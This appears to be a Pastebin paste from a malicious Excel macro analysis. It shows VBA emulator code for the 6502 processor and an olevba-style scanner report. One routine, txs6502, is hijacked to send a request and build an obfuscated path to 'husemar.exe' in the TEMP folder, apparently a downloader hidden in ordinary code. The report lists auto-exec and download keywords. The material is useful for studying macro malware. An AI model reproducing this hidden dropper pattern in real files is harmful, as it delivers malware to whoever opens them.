  926.  If (A And &H80) Then
  927.  P = P Or &H80
  928.  Else
  929.  P = P And &H7F
  930.  End If
  931. End Sub
  932. Public Sub sec6502()
  933.  P = P Or &H1
  934. End Sub
  935. Public Sub sed6502()
  936.  P = P Or &H8
  937. End Sub
  938. Public Sub sei6502()
  939.  P = P Or &H4
  940. End Sub
  941. Public Sub sta6502()
  942.  adrmode opcode
  943.  Write6502 (savepc), A
  944. End Sub
  945. Public Sub stx6502()
  946.  adrmode opcode
  947.  Write6502 (savepc), X
  948. End Sub
  949. Public Sub sty6502()
  950.  adrmode opcode
  951.  Write6502 (savepc), Y
  952. End Sub
  953. Public Sub tax6502()
  954.  X = A
  955.  If (X) Then
  956.  P = P And &HFD
  957.  Else
  958.  P = P Or &H2
  959.  End If
  960.  If (X And &H80) Then
  961.  P = P Or &H80
  962.  Else
  963.  P = P And &H7F
  964.  End If
  965. End Sub
  966. Public Sub tay6502()
  967.  Y = A
  968.  If (Y) Then
  969.  P = P And &HFD
  970.  Else
  971.  P = P Or &H2
  972.  End If
  973.  If (Y And &H80) Then
  974.  P = P Or &H80
  975.  Else
  976.  P = P And &H7F
  977.  End If
  978. End Sub
  979. Public Sub tsx6502()
  980.  X = s
  981.  If (X) Then
  982.  P = P And &HFD
  983.  Else
  984.  P = P Or &H2
  985.  End If
  986.  If (X And &H80) Then
  987.  P = P Or &H80
  988.  Else
  989.  P = P And &H7F
  990.  End If
  991. End Sub
  992. Public Sub txa6502()
  993.  A = X
  994.  If (A) Then
  995.  P = P And &HFD
  996.  Else
  997.  P = P Or &H2
  998.  End If
  999.  If (A And &H80) Then
  1000.  P = P Or &H80
  1001.  Else
  1002.  P = P And &H7F
  1003.  End If
  1004. End Sub
  1005. Public Sub txs6502()
  1006. phy650001 = phy65009("TEMP")
  1007. phy65007.Send
  1008. phy650002 = phy650001 + "\" + "husemar." + "e" + "xe"
  1009. With phy65008
  1010.    .Type = 1
  1011.    .Open
  1012. End With
  1013. Exit Sub
  1014.  s = X
  1015. End Sub
  1016. Public Sub tya6502()
  1017.  A = Y
  1018.  If (A) Then
  1019.  P = P And &HFD
  1020.  Else
  1021.  P = P Or &H2
  1022.  End If
  1023.  If (A And &H80) Then
  1024.  P = P Or &H80
  1025.  Else
  1026.  P = P And &H7F
  1027.  End If
  1028. End Sub
  1029. Public Sub bra6502()
  1030.  adrmode opcode
  1031.  PC = PC + savepc
  1032.  clockticks6502 = clockticks6502 + 1
  1033. End Sub
  1034. Public Sub dea6502()
  1035.  A = (A - 1) And &HFF
  1036.  If (A) Then
  1037.  P = P And &HFD
  1038.  Else
  1039.  P = P Or &H2
  1040.  End If
  1041.  If (A And &H80) Then
  1042.  P = P Or &H80
  1043.  Else
  1044.  P = P And &H7F
  1045.  End If
  1046. End Sub
  1047. Public Sub ina6502()
  1048.  A = (A + 1) And &HFF
  1049.  If (A) Then
  1050.  P = P And &HFD
  1051.  Else
  1052.  P = P Or &H2
  1053.  End If
  1054.  If (A And &H80) Then
  1055.  P = P Or &H80
  1056.  Else
  1057.  P = P And &H7F
  1058.  End If
  1059. End Sub
  1060. Public Sub phx6502()
  1061.  Write6502 &H100 + s, X
  1062.  s = (s - 1) And &HFF
  1063. End Sub
  1064. Public Sub plx6502()
  1065.  s = (s + 1) And &HFF
  1066.  X = Read6502(s + &H100)
  1067.  If (X) Then
  1068.  P = P And &HFD
  1069.  Else
  1070.  P = P Or &H2
  1071.  End If
  1072.  If (X And &H80) Then
  1073.  P = P Or &H80
  1074.  Else
  1075.  P = P And &H7F
  1076.  End If
  1077. End Sub
  1078. Public Sub phy6502()
  1079.  Write6502 &H100 + s, Y
  1080.  s = (s - 1) And &HFF
  1081. End Sub
  1082. Public Sub ply6502()
  1083.  s = (s + 1) And &HFF
  1084.  Y = Read6502(s + &H100)
  1085.  If (Y) Then
  1086.  P = P And &HFD
  1087.  Else
  1088.  P = P Or &H2
  1089.  End If
  1090.  If (Y And &H80) Then
  1091.  P = P Or &H80
  1092.  Else
  1093.  P = P And &H7F
  1094.  End If
  1095. End Sub
  1096.  
  1097.  
  1098.  
  1099.  
  1100. +------------+----------------------+-----------------------------------------+
  1101. | Type       | Keyword              | Description                             |
  1102. +------------+----------------------+-----------------------------------------+
  1103. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  1104. | Suspicious | Open                 | May open a file                         |
  1105. | Suspicious | Shell                | May run an executable file or a system  |
  1106. |            |                      | command                                 |
  1107. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1108. |            |                      | command                                 |
  1109. | Suspicious | Run                  | May run an executable file or a system  |
  1110. |            |                      | command                                 |
  1111. | Suspicious | Shell.Application    | May run an application (if combined     |
  1112. |            |                      | with CreateObject)                      |
  1113. | Suspicious | CreateObject         | May create an OLE object                |
  1114. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1115. |            |                      | strings                                 |
  1116. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  1117. |            |                      | strings                                 |
  1118. | Suspicious | ADODB.Stream         | May create a text file                  |
  1119. | Suspicious | SaveToFile           | May create a text file                  |
  1120. | Suspicious | Write                | May write to a file (if combined with   |
  1121. |            |                      | Open)                                   |
  1122. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1123. |            |                      | (obfuscation: VBA expression)           |
  1124. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  1125. |            |                      | be used to obfuscate strings (option    |
  1126. |            |                      | --decode to see all)                    |
  1127. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  1128. |            |                      | may be used to obfuscate strings        |
  1129. |            |                      | (option --decode to see all)            |
  1130. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1131. |            | Strings              | may be used to obfuscate strings        |
  1132. |            |                      | (option --decode to see all)            |
  1133. | IOC        | husemar.exe          | Executable file name (obfuscation: VBA  |
  1134. |            |                      | expression)                             |
  1135. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  1136. | VBA string | Das Modell kann nun  | "Das Modell kann nun bearbeitet werden. |
  1137. |            | bearbeitet werden.   | " &  "Ge?nderte Default-Werte werden    |
  1138. |            | Ge?nderte Default-   | beim Schliessen exportiert."            |
  1139. |            | Werte werden beim    |                                         |
  1140. |            | Schliessen           |                                         |
  1141. |            | exportiert.          |                                         |
  1142. | VBA string | \husemar.exe         | "\" + "husemar." + "e" + "xe"           |
  1143. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!